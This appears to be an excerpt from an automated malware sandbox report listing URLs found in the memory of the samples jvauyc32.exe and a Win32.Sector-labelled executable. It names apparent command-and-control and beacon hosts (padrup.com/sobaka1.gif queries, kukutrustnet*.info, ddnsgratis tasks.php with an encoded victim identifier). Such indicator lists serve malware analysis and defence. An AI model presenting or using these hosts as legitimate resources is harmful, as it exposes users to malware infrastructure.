        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3703628262.00000000066A6000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ifdnzact.com/?dn=padrup.com&pid=9PO755G95
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: jvauyc32.exe, 00000012.00000002.4037104835.0000000001470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n.ddnsgratis.com.br/n/tasks.php1401076386715766
        Source: jvauyc32.exe, 00000012.00000002.4062598961.000000000313B000.00000004.00000010.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000002.4041990668.0000000001510000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000002.4037104835.0000000001470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n.ddnsgratis.com.br/n/tasks.php9e146be9-c76a-4720-bcdb-53011b87bd06dGluYSA6IFRJTkEtUEMgOiA4Nz
        Source: jvauyc32.exe, 00000012.00000002.4035800801.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://n.ddnsgratis.com.br/n/tasks.phphttp://n.ddnsgratis.com.br/n/tasks.php9e146be9-c76a-4720-bcdb-
        Source: svchost.exe, 00000015.00000000.1746047400.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.4069997805.000001F0FD7A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712636020.00000000013F9000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1706613049.0000000000A43000.00000004.10000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?115dbf54=-1381402296
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2524944921.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?115dbf54=-1381402296X
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116#
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116c
        Source: jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116o
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?11fef99e=-1275740116w
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?12ba214d=-2095650533
        Source: jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?12ba214d=-2095650533o
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?13de3bbe=-1294984786
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1495f698=690744624
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1543ef95=713547562
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?165b05c=164090500
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?16b31880=-867443584
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?16b31880=-8674435840#K
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1781559f=-1928855110
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18285ae2=405297890
        Source: jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18285ae2=4052978900
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18285ae2=405297890z#
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?18b777d9=-977551672
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?195904b8=425264312
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?195904b8=425264312(
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1a078ca7=-1238050671
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?1a078ca7=-1238050671&
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?20c2a09=3091646250
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?20c2a09=309164625X
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?25bc9cf1=633117937
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?269bb762=239207342
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?269bb762=2392073424
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?27c85804=-957761516
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000L
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000e
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000el#
        Source: jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?28892810=465574000h
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2924596e=690248046B
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2924596e=690248046h
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?29d43e7c=701775484
        Source: jvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?29d43e7c=701775484w
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2a61d79=222204765
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2a61d79=222204765%
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2a61d79=222204765M
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2a6f2852=688527934L
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2a6f2852=688527934Z
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2b0ab4f0=-684357456
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?2b0ab4f0=-684357456l#
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?333df63=53731171
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?333df63=53731171%
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?33c00681=914368262
        Source: jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?33c00681=914368262c
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?3d3b9b1=192621843
        Source: jvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://padrup.com/sobaka1.gif?47aa66b=526028013
